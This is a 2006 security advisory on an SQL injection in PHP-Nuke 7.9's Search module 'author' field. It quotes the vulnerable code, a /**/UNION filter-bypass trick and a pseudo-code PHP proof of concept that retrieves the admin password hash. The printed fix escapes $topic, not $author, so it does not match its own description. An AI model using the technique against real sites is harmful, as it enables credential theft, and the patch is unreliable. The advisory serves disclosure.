PHP-Nuke <= 7.9 Search module "author" SQL Injection vulnerability

2006-10-30T00:00:00
ID SECURITYVULNS:DOC:14841
Type securityvulns
Reporter Securityvulns
Modified 2006-10-30T00:00:00

Description

/*

[N]eo [S]ecurity [T]eam [NST] - Advisory 28 - 2006-10-25

Program: PHP-Nuke Homepage: http://www.php.net Vulnerable Versions: PHP-Nuke <= 7.9 Risk: Medium Impact: Medium Risk

-==PHP-Nuke <= 7.9 Search module "author" SQL Injection vulnerability==-

- Description

PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases.

- Tested

localhost & many sites

- Vulnerability Description

In /modules/Search/index.php the "author" variable is not sanitized correctly. Here is the vulnerable code:

==[ /modules/Search/index.php 196-198 ]========================== [...] if (!empty($author)) $q .= "AND s.aid='$author' "; if (!empty($topic)) $q .= "AND s.topic='$topic' "; if (!empty($days) && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= '$days' "; [...] ==[ end /modules/Search/index.php ]==============================

Register_globals php directive must be turned Off so the simple quotes (') are not filtered. Also we have to know the prefix used for the database tables ("nuke_" by default).

In this way, bypassing the SQL Injection Protection, like using someone like '/**/UNION ' and not ' UNION ' in our sql injections, we can get the admin md5 hash without any problems.

==Pseudo-Code Proof of Concept exploit== <? /*

Neo Security Team - Pseudo-Code Proof of Concept Exploit http://www.neosecurityteam.net Paisterist

/ set_time_limit(0); $host="localhost"; $path="/phpnuke/"; $port="80"; $fp = fsockopen($host, $port, $errno, $errstr, 30); $data=""; / Here the variables, like "query", "topic" and "author" with the SQL Injection */

if ($fp) { / we put the POST request on $p variable, sending the data saved on $data. /

fwrite&#40;$fp, $p&#41;;

while &#40;!feof&#40;$fp&#41;&#41; {
    $content .= fread&#40;$fp, 4096&#41;;
}

preg_match&#40;&quot;/&#40;[a-zA-Z0-9]{32}&#41;/&quot;, $content, $matches&#41;;

if &#40;$matches[0]&#41;
print &quot;&lt;b&gt;Hash: &lt;/b&gt;&quot;.$matches[0];

} ?> ==Pseudo-Code Proof of Concept exploit==

Whit this PoC code i get the md5 hash of the first admin (God) of the nuke_authors table.

- How to fix it? More information?

You can found a patch on http://www.neosecurityteam.net/foro/

Also, you can modify the line 197 of /modules/Search/index.php, adding slashes before the simple quotes with the addslashes() function:

==[ /modules/Search/index.php 196-198 ]========================== [...] if (!empty($author)) $q .= "AND s.aid='$author' "; if (!empty($topic)) $q .= "AND s.topic='" . addslashes($topic) . "' "; if (!empty($days) && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= '$days' "; [...] ==[ end /modules/Search/index.php ]==============================

That's a momentary solution to the problem. I recommend to download the PHP-Nuke 8.0 version in the next days... it is not free at the moment.

- References

http://www.neosecurityteam.net/index.php?action=advisories&id=28

- Credits

Search module SQL Injection discovered by Paisterist -> paisterist[dot]nst [at] gmail[dot]com

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/

- Greets

HaCkZaTaN K4P0 Daemon21 Link 0m3gA_x LINUX nitrous m0rpheus nikyt0x KingMetal Knightmare

Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@ @@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@

/ EOF /